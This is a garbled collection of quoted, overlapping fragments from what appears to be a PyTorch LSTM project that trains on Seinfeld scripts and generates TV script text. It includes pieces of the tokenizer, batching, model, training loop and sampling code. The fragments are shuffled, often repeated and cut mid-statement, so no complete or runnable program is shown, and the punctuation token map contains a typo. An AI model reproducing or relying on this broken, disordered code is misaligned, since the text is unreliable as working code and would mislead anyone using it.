"next word probabilities p = F.softmax(output, dim=1).data if(train_on_gpu): p = p.cpu() # move", "Training parameters # Number of Epochs num_epochs = 5 # Learning Rate learning_rate", "the PyTorch RNN Module :param vocab_size: The number of input dimensions of the", "# Data params # Sequence Length sequence_length = 8 # of words in", "next word top_k = 5 p, top_i = p.topk(top_k) top_i = top_i.numpy().squeeze() #", "The sequence length of each batch :param batch_size: The size of each batch;", "vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() print(token_dict) print(int_text[:10]) print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10]) class RNN(nn.Module): def __init__(self,", "x.contiguous().view(-1, self.hidden_dim) # x = self.dropout(x) x = self.fc(x) x = x.view(batch_size, -1,", "torch.from_numpy(train_y)) train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size) # return a dataloader return train_loader int_text,", "criterion(output, target) loss.backward() nn.utils.clip_grad_norm_(rnn.parameters(), 5) optimizer.step() # return the loss over a batch", "gen_sentences = ' '.join(predicted) # Replace punctuation tokens for key, token in token_dict.items():", "{word: ii for ii, word in int_to_vocab.items()} return vocab_to_int, int_to_vocab def token_lookup(): \"\"\"", "\"\"\" Forward and backward propagation on the neural network :param decoder: The PyTorch", "training the model trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches) # saving", "available rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5) if train_on_gpu: rnn.cuda() #", "criterion, n_epochs, show_every_n_batches=100): batch_losses = [] rnn.train() print(\"Training for %d epoch(s)...\" % n_epochs)", "RNN(nn.Module): def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5): \"\"\" Initialize the PyTorch", "use a GPU to train your neural network.') def create_lookup_tables(text): \"\"\" Create lookup", "to gpu if available rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5) if", "= inp.cuda(), target.cuda() # perform backpropagation and optimization h = tuple([each.data for each", "tokens for key, token in token_dict.items(): ending = ' ' if key in", "return a dataloader return train_loader int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() print(token_dict) print(int_text[:10])", "loss = criterion(output, target) loss.backward() nn.utils.clip_grad_norm_(rnn.parameters(), 5) optimizer.step() # return the loss over", "shuffle=False, batch_size=batch_size) # return a dataloader return train_loader int_text, vocab_to_int, int_to_vocab, token_dict =", "in hidden]) rnn.zero_grad() output, h = rnn(inp, h) loss = criterion(output, target) loss.backward()", "target output for the batch of input :return: The loss and the latest", "batch_i % show_every_n_batches == 0: print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format( epoch_i, n_epochs, np.average(batch_losses))) batch_losses", "-1, self.output_size) x = x[:, -1] # return one batch of output word", "= ' ' if key in ['\\n', '(', '\"'] else '' gen_sentences =", "forward(self, nn_input, hidden): \"\"\" Forward propagation of the neural network :param nn_input: The", "x.view(batch_size, -1, self.output_size) x = x[:, -1] # return one batch of output", "to the neural network :param target: The target output for the batch of", "token_dict: Dict of puncuation tokens keys to puncuation values :param pad_value: The value", "# printing loss stats if batch_i % show_every_n_batches == 0: print('Epoch: {:>4}/{:<4} Loss:", "helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables) def batch_data(words, sequence_length, batch_size): \"\"\" Batch the neural network data", "the neural network and the latest hidden state \"\"\" batch_size = nn_input.size(0) x", "neural network and the latest hidden state \"\"\" batch_size = nn_input.size(0) x =", "int_to_vocab[word_i] predicted.append(word) # the generated word becomes the next \"current sequence\" and the", "F.softmax(output, dim=1).data if(train_on_gpu): p = p.cpu() # move to cpu # use top_k", "The target output for the batch of input :return: The loss and the", "for ii, word in enumerate(sorted_vocab)} vocab_to_int = {word: ii for ii, word in", "network :param decoder: The PyTorch Module that holds the neural network :param decoder_optimizer:", "of each batch; the number of sequences in a batch :return: DataLoader with", "rnn.zero_grad() output, h = rnn(inp, h) loss = criterion(output, target) loss.backward() nn.utils.clip_grad_norm_(rnn.parameters(), 5)", "nn.Linear(hidden_dim, output_size) self.dropout = nn.Dropout(dropout) def forward(self, nn_input, hidden): \"\"\" Forward propagation of", "inp, target, hidden): \"\"\" Forward and backward propagation on the neural network :param", "Vocab size vocab_size = len(vocab_to_int) # Output size output_size = vocab_size # Embedding", "'||COMMA||', '\"': '||QUOTATION_MARK||', ';': '||SEMICOLON||', '!': '||EXCLAMATION_MARK||', '?': '||QUESTION_MARK||', '(': '||LEFT_PAREN>||', ')': '||RIGHT_PAREN||',", "= int_to_vocab[word_i] predicted.append(word) # the generated word becomes the next \"current sequence\" and", "key is the punctuation and the value is the token \"\"\" return {", "if train_on_gpu: rnn.cuda() # defining loss and optimization functions for training optimizer =", "use top_k sampling to get the index of the next word top_k =", "for training optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate) criterion = nn.CrossEntropyLoss() # training the model", "= np.array(features) train_y = np.array(targets) train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y)) train_loader = DataLoader(train_data, shuffle=False,", "return all the sentences return gen_sentences # run the cell multiple times to", "each batch :param batch_size: The size of each batch; the number of sequences", "you choose to use them :param hidden_dim: The size of the hidden layer", "import torch import torch.nn as nn from string import punctuation from collections import", "and the latest hidden state Tensor \"\"\" # move data to GPU, if", "# Sequence Length sequence_length = 8 # of words in a sequence #", "word_i gen_sentences = ' '.join(predicted) # Replace punctuation tokens for key, token in", "size of the vocabulary) :param output_size: The number of output dimensions of the", "id keys to word values :param token_dict: Dict of puncuation tokens keys to", "vocabulary :param text: The text of tv scripts split into words :return: A", "sentences return gen_sentences # run the cell multiple times to get different results!", "\"\"\" word_counts = Counter(text) sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True) int_to_vocab = {ii: word", "hidden state return x, h def init_hidden(self, batch_size): ''' Initialize the hidden state", "# record loss batch_losses.append(loss) # printing loss stats if batch_i % show_every_n_batches ==", "loss over a batch and the hidden state produced by our model return", "current_seq = np.full((1, sequence_length), pad_value) current_seq[-1][-1] = prime_id predicted = [int_to_vocab[prime_id]] for _", "# initialize hidden state hidden = rnn.init_hidden(batch_size) for batch_i, (inputs, labels) in enumerate(train_loader,", "vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() trained_rnn = helper.load_model('./trained_tv_script') import torch.nn.functional as F def", "inp, target = inp.cuda(), target.cuda() # perform backpropagation and optimization h = tuple([each.data", "propagation of the neural network :param nn_input: The input to the neural network", "word probabilities p = F.softmax(output, dim=1).data if(train_on_gpu): p = p.cpu() # move to", "word index with some element of randomness p = p.numpy().squeeze() word_i = np.random.choice(top_i,", "nn.CrossEntropyLoss() # training the model trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches)", "hidden_dim, n_layers, dropout=0.5) if train_on_gpu: rnn.cuda() # defining loss and optimization functions for", "the neural network (the size of the vocabulary) :param output_size: The number of", "# Vocab size vocab_size = len(vocab_to_int) # Output size output_size = vocab_size #", "batch_losses = [] rnn.train() print(\"Training for %d epoch(s)...\" % n_epochs) for epoch_i in", "batch_size): \"\"\" Batch the neural network data using DataLoader :param words: The word", "# x = self.dropout(x) x = self.fc(x) x = x.view(batch_size, -1, self.output_size) x", "The text of tv scripts split into words :return: A tuple of dicts", "to GPU, if available if train_on_gpu: inp, target = inp.cuda(), target.cuda() # perform", "The loss and the latest hidden state Tensor \"\"\" # move data to", "Sequence Length sequence_length = 8 # of words in a sequence # Batch", "the neural network :param target: The target output for the batch of input", "the neural network :param embedding_dim: The size of embeddings, should you choose to", "a dataloader return train_loader int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() print(token_dict) print(int_text[:10]) print(list(vocab_to_int.values())[:10])", "input :return: The loss and the latest hidden state Tensor \"\"\" # move", "next word index with some element of randomness p = p.numpy().squeeze() word_i =", "self.dropout = nn.Dropout(dropout) def forward(self, nn_input, hidden): \"\"\" Forward propagation of the neural", "A batch of input to the neural network :param target: The target output", "only n_batches = len(train_loader.dataset)//batch_size if(batch_i > n_batches): break # forward, back prop loss,", "DataLoader with batched data \"\"\" n_batches = len(words)//batch_size words = words[:n_batches*batch_size] features =", "break # forward, back prop loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels,", "= words[idx+sequence_length] targets.append(y) train_x = np.array(features) train_y = np.array(targets) train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y))", "'||SEMICOLON||', '!': '||EXCLAMATION_MARK||', '?': '||QUESTION_MARK||', '(': '||LEFT_PAREN>||', ')': '||RIGHT_PAREN||', '-': '||DASH||', '\\n': '||RETURN||',", "Check for a GPU train_on_gpu = torch.cuda.is_available() if not train_on_gpu: print('No GPU found.", "int_to_vocab def token_lookup(): \"\"\" Generate a dict to turn punctuation into a token.", "= (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) return hidden def forward_back_prop(rnn, optimizer, criterion,", "h def init_hidden(self, batch_size): ''' Initialize the hidden state of an LSTM/GRU :param", "= ' '.join(predicted) # Replace punctuation tokens for key, token in token_dict.items(): ending", "state \"\"\" batch_size = nn_input.size(0) x = self.embedding(nn_input) x,h = self.lstm(x, hidden) x", "vocab_size: The number of input dimensions of the neural network (the size of", "to use them :param hidden_dim: The size of the hidden layer outputs :param", "1): # make sure you iterate over completely full batches, only n_batches =", "return the loss over a batch and the hidden state produced by our", "tokens keys to puncuation values :param pad_value: The value used to pad a", "should you choose to use them :param hidden_dim: The size of the hidden", "Epochs num_epochs = 5 # Learning Rate learning_rate = 0.001 # Model parameters", "the cycle can continue current_seq = np.roll(current_seq, -1, 1) current_seq[-1][-1] = word_i gen_sentences", "in a batch :return: DataLoader with batched data \"\"\" n_batches = len(words)//batch_size words", "each in hidden]) rnn.zero_grad() output, h = rnn(inp, h) loss = criterion(output, target)", "torch.nn as nn from string import punctuation from collections import Counter from torch.utils.data", "output for the batch of input :return: The loss and the latest hidden", "train_on_gpu: inp, target = inp.cuda(), target.cuda() # perform backpropagation and optimization h =", "= [] rnn.train() print(\"Training for %d epoch(s)...\" % n_epochs) for epoch_i in range(1,", "and the hidden state return x, h def init_hidden(self, batch_size): ''' Initialize the", "= hidden_dim # define model layers self.embedding = nn.Embedding(vocab_size, embedding_dim) self.lstm = nn.LSTM(embedding_dim,", "length of text to generate :return: The generated text \"\"\" rnn.eval() # create", "Data params # Sequence Length sequence_length = 8 # of words in a", "def create_lookup_tables(text): \"\"\" Create lookup tables for vocabulary :param text: The text of", "Generate a dict to turn punctuation into a token. :return: Tokenized dictionary where", "length of each batch :param batch_size: The size of each batch; the number", ":return: DataLoader with batched data \"\"\" n_batches = len(words)//batch_size words = words[:n_batches*batch_size] features", "split into words :return: A tuple of dicts (vocab_to_int, int_to_vocab) \"\"\" word_counts =", "# Model parameters # Vocab size vocab_size = len(vocab_to_int) # Output size output_size", "input to the neural network :param target: The target output for the batch", "p.cpu() # move to cpu # use top_k sampling to get the index", "= 5 p, top_i = p.topk(top_k) top_i = top_i.numpy().squeeze() # select the likely", "output, h = rnn(inp, h) loss = criterion(output, target) loss.backward() nn.utils.clip_grad_norm_(rnn.parameters(), 5) optimizer.step()", "not change train_loader = batch_data(int_text, sequence_length, batch_size) # Training parameters # Number of", "to turn punctuation into a token. :return: Tokenized dictionary where the key is", "n_epochs) for epoch_i in range(1, n_epochs + 1): # initialize hidden state hidden", "hidden = rnn.init_hidden(current_seq.size(0)) # get the output of the rnn output, _ =", "= np.full((1, sequence_length), pad_value) current_seq[-1][-1] = prime_id predicted = [int_to_vocab[prime_id]] for _ in", "holds the neural network :param decoder_optimizer: The PyTorch optimizer for the neural network", "and the latest hidden state \"\"\" batch_size = nn_input.size(0) x = self.embedding(nn_input) x,h", "not train_on_gpu: print('No GPU found. Please use a GPU to train your neural", ":param inp: A batch of input to the neural network :param target: The", "print('No GPU found. Please use a GPU to train your neural network.') def", "train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size) # return a dataloader return train_loader int_text, vocab_to_int,", "words: The word ids of the TV scripts :param sequence_length: The sequence length", "multiple times to get different results! gen_length = 400 # modify the length", "'jerry' # name for starting the script \"\"\" DON'T MODIFY ANYTHING IN THIS", "= words[idx:idx+sequence_length] features.append(x) y = words[idx+sequence_length] targets.append(y) train_x = np.array(features) train_y = np.array(targets)", "init_hidden(self, batch_size): ''' Initialize the hidden state of an LSTM/GRU :param batch_size: The", "LSTM/GRU layers \"\"\" super(RNN, self).__init__() # set class variables self.output_size = output_size self.n_layers", "numpy as np import torch import torch.nn as nn from string import punctuation", "number of output dimensions of the neural network :param embedding_dim: The size of", "else '' gen_sentences = gen_sentences.replace(' ' + token.lower(), key) gen_sentences = gen_sentences.replace('\\n ',", "gen_sentences = gen_sentences.replace('( ', '(') # return all the sentences return gen_sentences #", "labels, hidden) # record loss batch_losses.append(loss) # printing loss stats if batch_i %", "= 2 # Show stats for every n number of batches show_every_n_batches =", "batch_first=True) self.fc = nn.Linear(hidden_dim, output_size) self.dropout = nn.Dropout(dropout) def forward(self, nn_input, hidden): \"\"\"", "scores and the hidden state return x, h def init_hidden(self, batch_size): ''' Initialize", "some element of randomness p = p.numpy().squeeze() word_i = np.random.choice(top_i, p=p/p.sum()) # retrieve", ":return: A tuple of dicts (vocab_to_int, int_to_vocab) \"\"\" word_counts = Counter(text) sorted_vocab =", "num_epochs = 5 # Learning Rate learning_rate = 0.001 # Model parameters #", "hidden_dim, n_layers, dropout=dropout, batch_first=True) self.fc = nn.Linear(hidden_dim, output_size) self.dropout = nn.Dropout(dropout) def forward(self,", "cycle can continue current_seq = np.roll(current_seq, -1, 1) current_seq[-1][-1] = word_i gen_sentences =", "token. :return: Tokenized dictionary where the key is the punctuation and the value", "= p.numpy().squeeze() word_i = np.random.choice(top_i, p=p/p.sum()) # retrieve that word from the dictionary", "hidden_dim # define model layers self.embedding = nn.Embedding(vocab_size, embedding_dim) self.lstm = nn.LSTM(embedding_dim, hidden_dim,", "if batch_i % show_every_n_batches == 0: print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format( epoch_i, n_epochs, np.average(batch_losses)))", "'(', '\"'] else '' gen_sentences = gen_sentences.replace(' ' + token.lower(), key) gen_sentences =", "self.fc(x) x = x.view(batch_size, -1, self.output_size) x = x[:, -1] # return one", "prime_id predicted = [int_to_vocab[prime_id]] for _ in range(predict_len): if train_on_gpu: current_seq = torch.LongTensor(current_seq).cuda()", "over completely full batches, only n_batches = len(train_loader.dataset)//batch_size if(batch_i > n_batches): break #", "enumerate(sorted_vocab)} vocab_to_int = {word: ii for ii, word in int_to_vocab.items()} return vocab_to_int, int_to_vocab", "batch_i, (inputs, labels) in enumerate(train_loader, 1): # make sure you iterate over completely", "ii, word in enumerate(sorted_vocab)} vocab_to_int = {word: ii for ii, word in int_to_vocab.items()}", "train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches) # saving the trained model helper.save_model('./trained_tv_script', trained_rnn)", "n_layers, dropout=dropout, batch_first=True) self.fc = nn.Linear(hidden_dim, output_size) self.dropout = nn.Dropout(dropout) def forward(self, nn_input,", "= self.dropout(x) x = self.fc(x) x = x.view(batch_size, -1, self.output_size) x = x[:,", "PyTorch Module that holds the trained neural network :param prime_id: The word id", "for every n number of batches show_every_n_batches = 500 # create model and", "dim=1).data if(train_on_gpu): p = p.cpu() # move to cpu # use top_k sampling", "{}\\n'.format( epoch_i, n_epochs, np.average(batch_losses))) batch_losses = [] # returns a trained rnn return", "word in enumerate(sorted_vocab)} vocab_to_int = {word: ii for ii, word in int_to_vocab.items()} return", "\"\"\" DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE \"\"\"", "train_loader = batch_data(int_text, sequence_length, batch_size) # Training parameters # Number of Epochs num_epochs", "decoder: The PyTorch Module that holds the trained neural network :param prime_id: The", "int_to_vocab, token_dict = helper.load_preprocess() trained_rnn = helper.load_model('./trained_tv_script') import torch.nn.functional as F def generate(rnn,", "layers \"\"\" super(RNN, self).__init__() # set class variables self.output_size = output_size self.n_layers =", "the neural network :param nn_input: The input to the neural network :param hidden:", "loss batch_losses.append(loss) # printing loss stats if batch_i % show_every_n_batches == 0: print('Epoch:", "sure you iterate over completely full batches, only n_batches = len(train_loader.dataset)//batch_size if(batch_i >", "= torch.LongTensor(current_seq) # initialize the hidden state hidden = rnn.init_hidden(current_seq.size(0)) # get the", "x, h def init_hidden(self, batch_size): ''' Initialize the hidden state of an LSTM/GRU", "embedding_dim, hidden_dim, n_layers, dropout=0.5) if train_on_gpu: rnn.cuda() # defining loss and optimization functions", "trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches) # saving the trained model", "-1] # return one batch of output word scores and the hidden state", "', '\\n') gen_sentences = gen_sentences.replace('( ', '(') # return all the sentences return", "def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100): batch_losses = [] rnn.train() print(\"Training for", "to train your neural network.') def create_lookup_tables(text): \"\"\" Create lookup tables for vocabulary", "sorted(word_counts, key=word_counts.get, reverse=True) int_to_vocab = {ii: word for ii, word in enumerate(sorted_vocab)} vocab_to_int", "def token_lookup(): \"\"\" Generate a dict to turn punctuation into a token. :return:", "neural network (the size of the vocabulary) :param output_size: The number of output", "x,h = self.lstm(x, hidden) x = x.contiguous().view(-1, self.hidden_dim) # x = self.dropout(x) x", "of words in a sequence # Batch Size batch_size = 100 # data", "= 5 # Learning Rate learning_rate = 0.001 # Model parameters # Vocab", "text \"\"\" rnn.eval() # create a sequence (batch_size=1) with the prime_id current_seq =", "int_to_vocab = {ii: word for ii, word in enumerate(sorted_vocab)} vocab_to_int = {word: ii", "\"\"\" pad_word = helper.SPECIAL_WORDS['PADDING'] generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab, token_dict, vocab_to_int[pad_word],", "x = self.fc(x) x = x.view(batch_size, -1, self.output_size) x = x[:, -1] #", "our model return loss.item(), h def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100): batch_losses", "n_layers, dropout=0.5) if train_on_gpu: rnn.cuda() # defining loss and optimization functions for training", "# select the likely next word index with some element of randomness p", "by our model return loss.item(), h def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100):", "The number of input dimensions of the neural network (the size of the", "= next(self.parameters()).data if (train_on_gpu): hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else:", "'.': '||PERIOD||', ',': '||COMMA||', '\"': '||QUOTATION_MARK||', ';': '||SEMICOLON||', '!': '||EXCLAMATION_MARK||', '?': '||QUESTION_MARK||', '(':", ":param decoder: The PyTorch Module that holds the neural network :param decoder_optimizer: The", "DataLoader :param words: The word ids of the TV scripts :param sequence_length: The", "\"\"\" n_batches = len(words)//batch_size words = words[:n_batches*batch_size] features = [] targets = []", "Number of RNN Layers n_layers = 2 # Show stats for every n", "scripts :param sequence_length: The sequence length of each batch :param batch_size: The size", "_, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() trained_rnn = helper.load_model('./trained_tv_script') import torch.nn.functional as F", "from string import punctuation from collections import Counter from torch.utils.data import TensorDataset, DataLoader", "weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) return hidden def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden): \"\"\"", "tv scripts split into words :return: A tuple of dicts (vocab_to_int, int_to_vocab) \"\"\"", ":param token_dict: Dict of puncuation tokens keys to puncuation values :param pad_value: The", "GPU train_on_gpu = torch.cuda.is_available() if not train_on_gpu: print('No GPU found. Please use a", "of the neural network (the size of the vocabulary) :param output_size: The number", "h def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100): batch_losses = [] rnn.train() print(\"Training", "keys to word values :param token_dict: Dict of puncuation tokens keys to puncuation", "target: The target output for the batch of input :return: The loss and", "iterate over completely full batches, only n_batches = len(train_loader.dataset)//batch_size if(batch_i > n_batches): break", "network :param decoder_optimizer: The PyTorch optimizer for the neural network :param criterion: The", "for the neural network :param criterion: The PyTorch loss function :param inp: A", "optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate) criterion = nn.CrossEntropyLoss() # training the model trained_rnn =", "n_batches): break # forward, back prop loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs,", "epoch_i, n_epochs, np.average(batch_losses))) batch_losses = [] # returns a trained rnn return rnn", "of the hidden state :return: hidden state of dims (n_layers, batch_size, hidden_dim) '''", "token in token_dict.items(): ending = ' ' if key in ['\\n', '(', '\"']", "# move to cpu # use top_k sampling to get the index of", "Tensors, the output of the neural network and the latest hidden state \"\"\"", "Trained and Saved') _, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() trained_rnn = helper.load_model('./trained_tv_script') import", "the neural network :param decoder_optimizer: The PyTorch optimizer for the neural network :param", "_ = rnn(current_seq, hidden) # get the next word probabilities p = F.softmax(output,", "for idx in range(0, total): x = words[idx:idx+sequence_length] features.append(x) y = words[idx+sequence_length] targets.append(y)", "token \"\"\" return { '.': '||PERIOD||', ',': '||COMMA||', '\"': '||QUOTATION_MARK||', ';': '||SEMICOLON||', '!':", "starting the script \"\"\" DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW", "GPU, if available if train_on_gpu: inp, target = inp.cuda(), target.cuda() # perform backpropagation", "PyTorch RNN Module :param vocab_size: The number of input dimensions of the neural", "in between LSTM/GRU layers \"\"\" super(RNN, self).__init__() # set class variables self.output_size =", "neural network :param criterion: The PyTorch loss function :param inp: A batch of", "a batch :return: DataLoader with batched data \"\"\" n_batches = len(words)//batch_size words =", "''' Initialize the hidden state of an LSTM/GRU :param batch_size: The batch_size of", "hidden = rnn.init_hidden(batch_size) for batch_i, (inputs, labels) in enumerate(train_loader, 1): # make sure", "the dictionary word = int_to_vocab[word_i] predicted.append(word) # the generated word becomes the next", "return loss.item(), h def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100): batch_losses = []", "BELOW THIS LINE \"\"\" pad_word = helper.SPECIAL_WORDS['PADDING'] generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'],", "# get the next word probabilities p = F.softmax(output, dim=1).data if(train_on_gpu): p =", "the hidden state :return: hidden state of dims (n_layers, batch_size, hidden_dim) ''' #", "super(RNN, self).__init__() # set class variables self.output_size = output_size self.n_layers = n_layers self.hidden_dim", "the hidden state hidden = rnn.init_hidden(current_seq.size(0)) # get the output of the rnn", "the script \"\"\" DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS", "and Saved') _, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() trained_rnn = helper.load_model('./trained_tv_script') import torch.nn.functional", "key) gen_sentences = gen_sentences.replace('\\n ', '\\n') gen_sentences = gen_sentences.replace('( ', '(') # return", ":param nn_input: The input to the neural network :param hidden: The hidden state", "' '.join(predicted) # Replace punctuation tokens for key, token in token_dict.items(): ending =", "print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10]) class RNN(nn.Module): def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5): \"\"\"", "length to your preference prime_word = 'jerry' # name for starting the script", ":param hidden_dim: The size of the hidden layer outputs :param dropout: dropout to", "torch.LongTensor(current_seq).cuda() else: current_seq = torch.LongTensor(current_seq) # initialize the hidden state hidden = rnn.init_hidden(current_seq.size(0))", "(the size of the vocabulary) :param output_size: The number of output dimensions of", "of puncuation tokens keys to puncuation values :param pad_value: The value used to", "the likely next word index with some element of randomness p = p.numpy().squeeze()", "= 'jerry' # name for starting the script \"\"\" DON'T MODIFY ANYTHING IN", "= rnn.init_hidden(current_seq.size(0)) # get the output of the rnn output, _ = rnn(current_seq,", ":param batch_size: The size of each batch; the number of sequences in a", "token_dict, pad_value, predict_len=100): \"\"\" Generate text using the neural network :param decoder: The", "targets.append(y) train_x = np.array(features) train_y = np.array(targets) train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y)) train_loader =", "\"\"\" # move data to GPU, if available if train_on_gpu: inp, target =", "= criterion(output, target) loss.backward() nn.utils.clip_grad_norm_(rnn.parameters(), 5) optimizer.step() # return the loss over a", "p.topk(top_k) top_i = top_i.numpy().squeeze() # select the likely next word index with some", "1) current_seq[-1][-1] = word_i gen_sentences = ' '.join(predicted) # Replace punctuation tokens for", "'!': '||EXCLAMATION_MARK||', '?': '||QUESTION_MARK||', '(': '||LEFT_PAREN>||', ')': '||RIGHT_PAREN||', '-': '||DASH||', '\\n': '||RETURN||', }", "The size of embeddings, should you choose to use them :param hidden_dim: The", "embedding_dim) self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=dropout, batch_first=True) self.fc = nn.Linear(hidden_dim, output_size) self.dropout", "the hidden layer outputs :param dropout: dropout to add in between LSTM/GRU layers", "= [] total = len(words)-sequence_length for idx in range(0, total): x = words[idx:idx+sequence_length]", "criterion, inputs, labels, hidden) # record loss batch_losses.append(loss) # printing loss stats if", "= x.contiguous().view(-1, self.hidden_dim) # x = self.dropout(x) x = self.fc(x) x = x.view(batch_size,", "Layers n_layers = 2 # Show stats for every n number of batches", "return one batch of output word scores and the hidden state return x,", "optimizer, criterion, num_epochs, show_every_n_batches) # saving the trained model helper.save_model('./trained_tv_script', trained_rnn) print('Model Trained", "collections import Counter from torch.utils.data import TensorDataset, DataLoader data_dir = './data/Seinfeld_Scripts.txt' text =", "import torch.nn.functional as F def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100): \"\"\" Generate", "RNN Module :param vocab_size: The number of input dimensions of the neural network", "tuple([each.data for each in hidden]) rnn.zero_grad() output, h = rnn(inp, h) loss =", "'||RIGHT_PAREN||', '-': '||DASH||', '\\n': '||RETURN||', } helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables) def batch_data(words, sequence_length, batch_size):", "the next \"current sequence\" and the cycle can continue current_seq = np.roll(current_seq, -1,", "key, token in token_dict.items(): ending = ' ' if key in ['\\n', '(',", "= tuple([each.data for each in hidden]) rnn.zero_grad() output, h = rnn(inp, h) loss", ":return: The generated text \"\"\" rnn.eval() # create a sequence (batch_size=1) with the", "+ token.lower(), key) gen_sentences = gen_sentences.replace('\\n ', '\\n') gen_sentences = gen_sentences.replace('( ', '(')", "sequence_length = 8 # of words in a sequence # Batch Size batch_size", "import Counter from torch.utils.data import TensorDataset, DataLoader data_dir = './data/Seinfeld_Scripts.txt' text = helper.load_data(data_dir)", "\"\"\" Generate text using the neural network :param decoder: The PyTorch Module that", "len(train_loader.dataset)//batch_size if(batch_i > n_batches): break # forward, back prop loss, hidden = forward_back_prop(rnn,", "self.embedding(nn_input) x,h = self.lstm(x, hidden) x = x.contiguous().view(-1, self.hidden_dim) # x = self.dropout(x)", "hidden state hidden = rnn.init_hidden(batch_size) for batch_i, (inputs, labels) in enumerate(train_loader, 1): #", "batch of input :return: The loss and the latest hidden state Tensor \"\"\"", "use them :param hidden_dim: The size of the hidden layer outputs :param dropout:", "dropout=dropout, batch_first=True) self.fc = nn.Linear(hidden_dim, output_size) self.dropout = nn.Dropout(dropout) def forward(self, nn_input, hidden):", "outputs :param dropout: dropout to add in between LSTM/GRU layers \"\"\" super(RNN, self).__init__()", "backward propagation on the neural network :param decoder: The PyTorch Module that holds", "the trained neural network :param prime_id: The word id to start the first", "model trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches) # saving the trained", "forward, back prop loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden) #", "to start the first prediction :param int_to_vocab: Dict of word id keys to", "PyTorch optimizer for the neural network :param criterion: The PyTorch loss function :param", "vocabulary) :param output_size: The number of output dimensions of the neural network :param", "np.average(batch_losses))) batch_losses = [] # returns a trained rnn return rnn # Data", "Embedding Dimension embedding_dim = 128 # Hidden Dimension hidden_dim = 512 # Number", "of Epochs num_epochs = 5 # Learning Rate learning_rate = 0.001 # Model", "an LSTM/GRU :param batch_size: The batch_size of the hidden state :return: hidden state", "if(train_on_gpu): p = p.cpu() # move to cpu # use top_k sampling to", "a GPU train_on_gpu = torch.cuda.is_available() if not train_on_gpu: print('No GPU found. Please use", "words :return: A tuple of dicts (vocab_to_int, int_to_vocab) \"\"\" word_counts = Counter(text) sorted_vocab", "train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100): batch_losses = [] rnn.train() print(\"Training for %d", "latest hidden state \"\"\" batch_size = nn_input.size(0) x = self.embedding(nn_input) x,h = self.lstm(x,", "100 # data loader - do not change train_loader = batch_data(int_text, sequence_length, batch_size)", "PyTorch loss function :param inp: A batch of input to the neural network", "train_on_gpu: current_seq = torch.LongTensor(current_seq).cuda() else: current_seq = torch.LongTensor(current_seq) # initialize the hidden state", "'||QUESTION_MARK||', '(': '||LEFT_PAREN>||', ')': '||RIGHT_PAREN||', '-': '||DASH||', '\\n': '||RETURN||', } helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables)", "_ in range(predict_len): if train_on_gpu: current_seq = torch.LongTensor(current_seq).cuda() else: current_seq = torch.LongTensor(current_seq) #", "forward_back_prop(rnn, optimizer, criterion, inp, target, hidden): \"\"\" Forward and backward propagation on the", "# Number of Epochs num_epochs = 5 # Learning Rate learning_rate = 0.001", "a dict to turn punctuation into a token. :return: Tokenized dictionary where the", "print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format( epoch_i, n_epochs, np.average(batch_losses))) batch_losses = [] # returns a", "% show_every_n_batches == 0: print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format( epoch_i, n_epochs, np.average(batch_losses))) batch_losses 